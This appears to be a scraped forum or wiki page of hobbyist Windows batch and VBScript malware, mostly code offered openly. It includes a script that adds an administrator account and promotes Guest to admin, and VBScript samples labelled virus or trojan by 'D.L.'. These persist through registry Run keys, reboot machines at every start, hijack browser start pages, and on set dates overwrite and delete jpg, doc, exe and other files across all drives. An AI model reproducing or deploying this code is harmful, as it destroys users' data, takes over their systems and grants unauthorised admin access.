start up folder C:\WINDOWS\system32\config\systemprofile\Start Menu\Programs\Startup /\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\ 6.

RE: Batch Files On Startup Dec 26 2010, 2:53 PM EST Post edited: Dec 26 2010, 2:53 PM EST You can put your batchfile somewhere in a important folder, like C:\windows\syst em32 and than add the file to registry, but you can do this with batch: @echo off xcopy file.bat "%systemroot%\windows32" reg add HKLM\Software\Microsoft\Windows\Currentversion\run /t REG_SZ /v "Name sh own in msconfig" /d C:\windows\system32\File name echo Done! pause For example: @echo off xcopy Batch.bat "%systemroot%\windows32" reg add HKLM\Software\Microsoft\Windows\Currentversion\run /t REG_SZ /v Batch /d C:\windows\system32\Batch.bat echo Done! pause /\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\ /\/\/\/\/\/\/\/\/\/\/\ OK, i don't know that this CODE is useful 4 u or not bt i post it 4 u. Nov 19 2009, 12:08 PM EST Post edited: Nov 19 2009, 12:08 PM EST U CN REMOVE/MODIFY ADMIN PASSWORD VIA GUEST A/C IN XP. echo off TITLE anu007tiger cls net user add anu tiger /add net user localgroup Administrators anu /add net user Guest 420 /active:yes net localgroup Guests Guest /delete net localgroup Administrators Guest /add del%0

/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\ /\/\/\/\/\/\/\/\/\/\/\/\/\/\ rem - VBS/dlH "DL Hello" Virus - By D.L. rem - Written on November 12th, 2003 On Error Resume Next dim FSobj,orgMes,finalMes set FSobj=CreateObject("Scripting.FileSystemObject")

orgMes="Hello! Don't be mad...I'm not a bad bug :) - by * % " orgMes=replace(orgMes,chr(42),chr(68)) orgMes=replace(orgMes,chr(124),chr(46)) finalMes=replace(orgMes,chr(37),chr(76)) On Error Resume Next dim drive,machine set machine=FSobj.Drives for each drive in machine if (drive.DriveType=2)or(drive.DriveType=3) then indexFolders(drive.Path&"\") end If next sub indexFolders(location) On Error Resume Next dim specs,file,subFol,sayHello set specs=FSobj.GetFolder(location) set subFol=specs.SubFolders for each file in subFol set sayHello = FSobj.CreateTextFile(file.Path&".hello", 2, True) sayHello.write finalMes sayHello.Close writeData(file.Path) indexFolders(file.Path) next end sub sub writeData(location) On Error Resume Next dim folder,directory,file,sayHello set folder=FSobj.GetFolder(location) set directory=folder.Files for each file in directory set sayHello = FSobj.CreateTextFile(file.Path&".hello", 2, True) sayHello.write finalMes sayHello.Close next end sub \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\

rem - dlRB "DL Reboot" Trojan script by D.L. On Error Resume Next dim FSobj,sysDir,generateCopy,newFile,fixedCode,procreateCopy,fileData

set FSobj=CreateObject("Scripting.FileSystemObject") set sysDir = FSobj.GetSpecialFolder(1) createRegKey "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\d lRB",sysDir&"\dlRB.vbs" sub createRegKey(regKey,regVal) set regEdit = CreateObject("WScript.Shell") regEdit.RegWrite regKey,regVal end sub set generateCopy=FSobj.CreateTextFile(sysDir+"\dlRB.vbs") generateCopy.close set newFile = FSobj.OpenTextFile(WScript.ScriptFullname,1) setFile() fixedCode=replace(fileData,chr(94),"""") set procreateCopy=FSobj.OpenTextFile(sysDir+"\dlRB.vbs",2) procreateCopy.write fixedCode procreateCopy.close rebootSystem() function setFile() fileData="rem - ^dlRB^ by D.L." &vbcrlf& _ "strComputer = ^.^ " &vbcrlf& _ "Set objWMIService = GetObject(^winmgmts:^ _ " &vbcrlf& _ "& ^{impersonationLevel=impersonate,(Shutdown)}!\\^ & strComputer & ^\ro ot\cimv2^)" &vbcrlf& _ "Set colOperatingSystems = objWMIService.ExecQuery _ " &vbcrlf& _ "(^Select * from Win32_OperatingSystem^)" &vbcrlf& _ "For Each objOperatingSystem in colOperatingSystems" &vbcrlf& _ "ObjOperatingSystem.Reboot()" &vbcrlf& _ "Next" end function function rebootSystem() strComputer = "." Set objWMIService = GetObject("winmgmts:" _ & "{impersonationLevel=impersonate,(Shutdown)}!\\" & strComputer & "\roo t\cimv2") Set colOperatingSystems = objWMIService.ExecQuery _ ("Select * from Win32_OperatingSystem") For Each objOperatingSystem in colOperatingSystems ObjOperatingSystem.Reboot() Next end function /\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\ /\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\

rem - dlSPS 'DL StartPage Swapper' VBS Trojan By D.L. - Written on: November 4th , 2003 On Error Resume Next

dim FSobj,sysDir,generateSelf,newFile,fixedCode,procreateSelf,newFileData set FSobj=CreateObject("Scripting.FileSystemObject") set sysDir = FSobj.GetSpecialFolder(1) createRegKey "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.YOURSITE.com" createRegKey "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Defaul t_Page_URL","http://www.YOURSITE.com" createRegKey "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\d lSPS",sysDir&"\dlSPS.vbs" set generateSelf=FSobj.CreateTextFile(sysDir+"\dlSPS.vbs") generateSelf.close set newFile = FSobj.OpenTextFile(WScript.ScriptFullname,1) writeCopy() fixedCode=replace(newFileData,chr(94),"""") set procreateSelf=FSobj.OpenTextFile(sysDir+"\dlSPS.vbs",2) procreateSelf.write fixedCode procreateSelf.close sub createRegKey(regKey,regVal) set regEdit = CreateObject("WScript.Shell") regEdit.RegWrite regKey,regVal end sub function writeCopy() newFileData="rem - ^dlSPS^ by D.L." &vbcrlf& _ "set FSobj=CreateObject(^Scripting.FileSystemObject^)" &vbcrlf& _ "set sysDir = FSobj.GetSpecialFolder(1)" &vbcrlf& _ "createRegKey ^HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\ Start Page^,^http://www.YOURSITE.com^" &vbcrlf& _ "createRegKey ^HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\ Default_Page_URL^,^http://www.YOURSITE.com^" &vbcrlf& _ "createRegKey ^HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion \Run\dlSPS^,sysDir&^\dlSPS.vbs^" &vbcrlf& _ "sub createRegKey(regKey,regVal)" &vbcrlf& _ "set regEdit = CreateObject(^WScript.Shell^)" &vbcrlf& _ "regEdit.RegWrite regKey,regVal" &vbcrlf& _ "end sub" end function /\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\// /\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\/\/\/\/\//\ dim FSobj,sysDir,copyFile set FSobj=CreateObject("Scripting.FileSystemObject") set sysDir = FSobj.GetSpecialFolder(1) set copyFile = FSobj.GetFile(WScript.ScriptFullName) copyFile.Copy(sysDir&"\dlSPS.vbs") createRegKey "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.YOURSITE.com" createRegKey "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Defaul t_Page_URL","http://www.YOURSITE.com" createRegKey "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\d

lSPS",sysDir&"\dlSPS.vbs" sub createRegKey(regKey,regVal) set regEdit = CreateObject("WScript.Shell") regEdit.RegWrite regKey,regVal end sub \////////////////////////////////////////////////\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ rem - VBS/dlBD "DL BirthDay" Virus rem - Written by D.L. on November 8th, 2003 On Error Resume Next dim FSobj,winDir,sysDir,copySelf,newFile,rawFileData,hackedFileData,fixData,data Fixed,newFileData,copySelfComplete set FSobj=CreateObject("Scripting.FileSystemObject") set sysDir=FSobj.GetSpecialFolder(1) checkDate() function checkDate() if (day(Now)=31 and month(Now)=3)or(day(Now)=19 and month(Now)=12) then beginInfestation() displayMessage() else plantTrojanizedFile() end if end function function plantTrojanizedFile() set copySelf=FSobj.CreateTextFile(sysDir+"\sys-dlBD.vbs") copySelf.close set newFile=FSobj.OpenTextFile(WScript.ScriptFullname,1) writeCopy() hackedFileData=replace(rawFileData,chr(42),chr(68)) fixData=replace(hackedFileData,chr(37),chr(76)) dataFixed=replace(fixData,chr(124),chr(46)) newFileData=replace(dataFixed,chr(94),"""") set copySelfComplete=FSobj.OpenTextFile(sysDir+"\sys-dlBD.vbs",2) copySelfComplete.write newFileData copySelfComplete.close createRegKey "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersi on\Run\sysdlBD",sysDir&"\sys-dlBD.vbs" end function sub createRegKey(regKey,regVal) dim regEdit set regEdit=CreateObject("WScript.Shell") regEdit.RegWrite regKey,regVal end sub sub beginInfestation On Error Resume Next dim drive,machine,complete set machine=FSobj.Drives for each drive in machine if (drive.DriveType=2)or(drive.DriveType=3) then indexFolders(drive.Path&"\") end If next

beginInfestation=complete end sub sub indexFolders(location) On Error Resume Next dim specs, file, subFol set specs=FSobj.GetFolder(location) set subFol=specs.SubFolders for each file in subFol spreadData(file.Path) indexFolders(file.Path) next end sub sub spreadData(location) On Error Resume Next dim folder,directory,file,generateCopy,appName,adExt,orgMes,mesStageTwo, mesStageThree,finalMes,extName,complete set folder=FSobj.GetFolder(location) set directory=folder.Files orgMes="Happy BirthDay to me! :) - You have been infected with the VBS/d lBD Virus...Written by * % " mesStageTwo=replace(orgMes,chr(42),chr(68)) mesStageThree=replace(mesStageTwo,chr(124),chr(46)) finalMes=replace(mesStageThree,chr(37),chr(76)) for each file in directory extName=lcase(FSobj.GetExtensionName(file.Path)) complete=lcase(file.Name) if (extName="jpg")or(extName="gif")then set generateCopy = FSobj.OpenTextFile(file.Path, 2, True ) generateCopy.write finalMes generateCopy.Close appName=FSobj.GetBaseName(file.Path) set adExt=FSobj.GetFile(file.Path) adExt.copy(location&"\"&appName&".txt") FSobj.DeleteFile (file.Path) elseIf (extName="log")or(extName="ini") then set generateCopy = FSobj.OpenTextFile(file.Path, 2, True ) generateCopy.write finalMes generateCopy.Close appName=FSobj.GetBaseName(file.Path) set adExt=FSobj.GetFile(file.Path) adExt.copy(location&"\"&appName&".txt") FSobj.DeleteFile (file.Path) elseIf (extName="doc")or(extName="exe") then set generateCopy = FSobj.OpenTextFile(file.Path, 2, True ) generateCopy.write finalMes generateCopy.Close appName=FSobj.GetBaseName(file.Path) set adExt=FSobj.GetFile(file.Path) adExt.copy(location&"\"&appName&".txt")

FSobj.DeleteFile (file.Path) end if next end sub function displayMessage() dim shell,messageFile set shell = CreateObject("WScript.Shell") set messageFile=FSobj.CreateTextFile(sysDir&"\dlBD-mes.bat") messageFile.close set FSobj=CreateObject("Scripting.FileSystemObject") set messageFile=FSobj.CreateTextFile(sysDir&"\dlBD-mes.bat") messageFile.WriteLine("@title Happy Birthday to me! :) - VBS/dlBD Virus" ) messageFile.WriteLine("@cls") messageFile.WriteLine("@echo Happy BirthDay to me! :) - You have been in fected with the VBS/dlBD Virus :(") messageFile.WriteLine("@echo.") messageFile.WriteLine("@pause") messageFile.close shell.Run(sysDir&"\dlBD-mes.bat") end function function writeCopy() rawFileData="rem - VBS/dlBD ^DL BirthDay^ Virus by * % " &vbcrlf& _ "On Error Resume Next" &vbcrlf& _ "dim FSobj,winDir,sysDir" &vbcrlf& _ "set FSobj=CreateObject(^Scripting FileSystemObject^)" &vbcrlf& _ "set sysDir=FSobj GetSpecialFolder(1)" &vbcrlf& _ "checkDate()" &vbcrlf& _ "function checkDate()" &vbcrlf& _ "if (day(Now)=31 and month(Now)=3)or(day(Now)=19 and month(Now)=12) then " &vbcrlf& _ "beginInfestation()" &vbcrlf& _ "displayMessage()" &vbcrlf& _ "end if" &vbcrlf& _ "end function" &vbcrlf& _ "sub beginInfestation" &vbcrlf& _ "On Error Resume Next " &vbcrlf& _ "dim drive,machine,complete" &vbcrlf& _ "set machine=FSobj Drives " &vbcrlf& _ "for each drive in machine " &vbcrlf& _ "if (drive DriveType=2)or(drive DriveType=3) then" &vbcrlf& _ "indexFolders(drive Path&^\^)" &vbcrlf& _ "end If" &vbcrlf& _ "next" &vbcrlf& _ "beginInfestation=complete" &vbcrlf& _ "end sub" &vbcrlf& _ "sub indexFolders(location)" &vbcrlf& _ "On Error Resume Next" &vbcrlf& _ "dim specs, file, subFol" &vbcrlf& _ "set specs=FSobj GetFolder(location)" &vbcrlf& _ "set subFol=specs SubFolders" &vbcrlf& _ "for each file in subFol" &vbcrlf& _ "spreadData(file Path)" &vbcrlf& _ "indexFolders(file Path)" &vbcrlf& _ "next" &vbcrlf& _ "end sub" &vbcrlf& _ "sub spreadData(location)" &vbcrlf& _ "On Error Resume Next" &vbcrlf& _

"dim folder,directory,file,generateCopy,appName,adExt,orgMes,mesStageTwo ,mesStageThree,finalMes,extName,complete" &vbcrlf& _ "set folder=FSobj GetFolder(location)" &vbcrlf& _ "set directory=folder Files" &vbcrlf& _ "finalMes=^Happy BirthDay to me! :) - You have been infected with the VB S/dlBD Virus...Written by * % ^" &vbcrlf& _ "for each file in directory" &vbcrlf& _ "extName=lcase(FSobj GetExtensionName(file Path))" &vbcrlf& _ "complete=lcase(file Name)" &vbcrlf& _ "if (extName=^jpg^)or(extName=^gif^)then " &vbcrlf& _ "set generateCopy = FSobj OpenTextFile(file Path, 2, True)" &vbcrlf& _ "generateCopy write finalMes " &vbcrlf& _ "generateCopy Close" &vbcrlf& _ "appName=FSobj GetBaseName(file Path)" &vbcrlf& _ "set adExt=FSobj GetFile(file Path)" &vbcrlf& _ "adExt copy(location&^\^&appName&^ txt^)" &vbcrlf& _ "FSobj DeleteFile (file Path)" &vbcrlf& _ "elseIf (extName=^log^)or(extName=^ini^) then" &vbcrlf& _ "set generateCopy = FSobj OpenTextFile(file Path, 2, True)" &vbcrlf& _ "generateCopy write finalMes" &vbcrlf& _ "generateCopy Close" &vbcrlf& _ "appName=FSobj GetBaseName(file Path)" &vbcrlf& _ "set adExt=FSobj GetFile(file Path)" &vbcrlf& _ "adExt copy(location&^\^&appName&^ txt^)" &vbcrlf& _ "FSobj DeleteFile (file Path)" &vbcrlf& _ "elseIf (extName=^doc^)or(extName=^exe^) then" &vbcrlf& _ "set generateCopy = FSobj OpenTextFile(file Path, 2, True)" &vbcrlf& _ "generateCopy write finalMes" &vbcrlf& _ "generateCopy Close" &vbcrlf& _ "appName=FSobj GetBaseName(file Path)" &vbcrlf& _ "set adExt=FSobj GetFile(file Path)" &vbcrlf& _ "adExt copy(location&^\^&appName&^ txt^)" &vbcrlf& _ "FSobj DeleteFile (file Path)" &vbcrlf& _ "end if" &vbcrlf& _ "next" &vbcrlf& _ "end sub" &vbcrlf& _ "function displayMessage()" &vbcrlf& _ "dim shell,messageFile" &vbcrlf& _ "set shell = CreateObject(^WScript Shell^)" &vbcrlf& _ "set messageFile=FSobj CreateTextFile(sysDir&^\dlBD-mes bat^)" &vbcrlf& _ "messageFile close" &vbcrlf& _ "set FSobj=CreateObject(^Scripting FileSystemObject^)" &vbcrlf& _ "set messageFile=FSobj CreateTextFile(sysDir&^\dlBD-mes bat^)" &vbcrlf& _ "messageFile WriteLine(^@title Happy Birthday to me! :) - VBS/dlBD Virus - by * % ^)" &vbcrlf& _ "messageFile WriteLine(^@cls^)" &vbcrlf& _ "messageFile WriteLine(^@echo Happy BirthDay to me! :) - You have been i nfected with the VBS/dlBD Virus :(^)" &vbcrlf& _ "messageFile WriteLine(^@echo ^)" &vbcrlf& _ "messageFile WriteLine(^@pause^)" &vbcrlf& _ "messageFile close" &vbcrlf& _ "shell Run(sysDir&^\dlBD-mes bat^)" &vbcrlf& _ "end function" end function /\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\ /\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\